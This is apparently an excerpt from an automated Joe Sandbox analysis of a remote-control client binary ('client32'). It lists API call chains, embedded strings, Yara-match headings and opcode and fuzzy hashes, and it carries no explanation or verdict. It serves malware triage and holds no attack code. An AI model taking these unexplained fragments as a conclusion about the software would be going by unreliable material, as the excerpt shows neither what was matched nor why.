                                                                                                • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                                • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                                • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                • API String ID: 1136984157-1986719024
                                                                                                • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                                • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumExitSleepThreadWindows
                                                                                                • String ID: TapiFix
                                                                                                • API String ID: 1804117399-2824097521
                                                                                                • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                                • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                                                • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                                • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                                                • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                • API String ID: 1319256379-1986719024
                                                                                                • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                                • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                                                • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                                • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2782032738-0
                                                                                                • Opcode ID: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
                                                                                                • Instruction ID: f9a13422eb449d7823f3456157ea6bdf1a688d76fba681891c709322d94b7ecb
                                                                                                • Opcode Fuzzy Hash: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
                                                                                                • Instruction Fuzzy Hash: 5F41D271A00704DBDB14CFA9C8A46AEBBB5FF81360F24863DD46697990D771EA81CB60
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69D000D2
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69D000E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CF0BA3
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF0BB8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CFF9F9
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CFFA0E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                APIs
                                                                                                  • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                                  • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                                                • _malloc.LIBCMT ref: 110491DD
                                                                                                • _memmove.LIBCMT ref: 110491EA
                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,000103BC,?,00000002,00001388,?), ref: 11049224
                                                                                                • _free.LIBCMT ref: 1104922B
                                                                                                  • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                                  • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                                  • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CECCCD
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CECCE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 69D1DFBA
                                                                                                • __isleadbyte_l.LIBCMT ref: 69D1DFED
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?), ref: 69D1E01E
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?), ref: 69D1E08C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?,?,?,?,?,69CED68F), ref: 69CE596C
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,69CED68F), ref: 69CE597D
                                                                                                • SetEvent.KERNEL32(00000180,?,?,?,?,?,69CED68F), ref: 69CE59B7
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,69CED68F), ref: 69CE59CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?), ref: 69CE68AE
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE68C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID: ERROR$RESULT
                                                                                                • API String ID: 3168844106-833402571
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?), ref: 69CE73DE
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE73F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID: ERROR$RESULT
                                                                                                • API String ID: 3168844106-833402571
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,?,00000000), ref: 69CE7EB7
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,00000000), ref: 69CE7ED0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID: RESULT$b
                                                                                                • API String ID: 3168844106-4141403093
                                                                                                APIs
                                                                                                • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                                • SetRect.USER32 ref: 111430A9
                                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                                • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Color$RectText
                                                                                                • String ID:
                                                                                                • API String ID: 4034337308-0
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32 ref: 110675BB
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                                • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchEvent
                                                                                                • String ID:
                                                                                                • API String ID: 4257095537-0
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 69CFC190
                                                                                                • _malloc.LIBCMT ref: 69CFC199
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 69CFC1B0
                                                                                                  • Part of subcall function 69CFBA20: __strdup.LIBCMT ref: 69CFBA3A
                                                                                                • _free.LIBCMT ref: 69CFC1C2
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: ByteCharHeapMultiWide$AllocateErrorFreeLast__strdup_free_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2344877359-0
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CE5B45
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE5B76
                                                                                                • SetEvent.KERNEL32(00000180), ref: 69CE5B8E
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE5B99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                • String ID:
                                                                                                • API String ID: 3394196147-0
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CE5AD0
                                                                                                • _memmove.LIBCMT ref: 69CE5AEC
                                                                                                • _memmove.LIBCMT ref: 69CE5B0A
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE5B17
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_memmove$EnterLeave
                                                                                                • String ID:
                                                                                                • API String ID: 324922381-0
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • CreateWindowExA.USER32 ref: 110073A7
                                                                                                • SetFocus.USER32 ref: 11007403
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                • String ID: edit
                                                                                                • API String ID: 1305092643-2167791130
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CF0EEB
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF0F00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: PIN
                                                                                                • API String ID: 1338273076-589459321
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CEFBD5
                                                                                                • _memmove.LIBCMT ref: 69CEFC26
                                                                                                  • Part of subcall function 69CEF470: std::_Xinvalid_argument.LIBCPMT ref: 69CEF48A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                • String ID: string too long
                                                                                                • API String ID: 2168136238-2556327735
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                                • _memmove.LIBCMT ref: 11009336
                                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                • String ID: string too long
                                                                                                • API String ID: 2168136238-2556327735
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                                • String ID: string too long
                                                                                                • API String ID: 256744135-2556327735
                                                                                                APIs
                                                                                                • _calloc.LIBCMT ref: 1103B162
                                                                                                • _free.LIBCMT ref: 1103B25B
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                                • String ID: CLTCONN.CPP
                                                                                                • API String ID: 183652615-2872349640
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: DATA
                                                                                                • API String ID: 269201875-2607161047
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 110AD1E3
                                                                                                  • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll), ref: 110ACEC4
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEE1
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEEE
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEFC
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF0A
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF18
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF26
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF34
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF42
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF50
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF5E
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF6C
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF7A
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF88
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF96
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACFA4
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACFB2
                                                                                                • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                                                Strings
                                                                                                • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$FreeLoad_memset
                                                                                                • String ID: winscard.dll is NOT valid!!!
                                                                                                • API String ID: 212038770-1939809930
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                • String ID: string too long
                                                                                                • API String ID: 963545896-2556327735
                                                                                                APIs
                                                                                                • GetDlgItemTextA.USER32 ref: 110232D7
                                                                                                • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ItemText
                                                                                                • String ID: ...
                                                                                                • API String ID: 3367045223-440645147
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CEF3B4
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D01928
                                                                                                  • Part of subcall function 69D01913: __CxxThrowException@8.LIBCMT ref: 69D0193D
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D0194E
                                                                                                • _memmove.LIBCMT ref: 69CEF3FB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                • String ID: string too long
                                                                                                • API String ID: 1785806476-2556327735
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: @
                                                                                                • API String ID: 4104443479-2766056989
                                                                                                APIs
                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                  • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32 ref: 110CBA0C
                                                                                                  • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                                • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                                • _memset.LIBCMT ref: 11039216
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                                • String ID: 445817
                                                                                                • API String ID: 3037201586-3924157528
                                                                                                • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
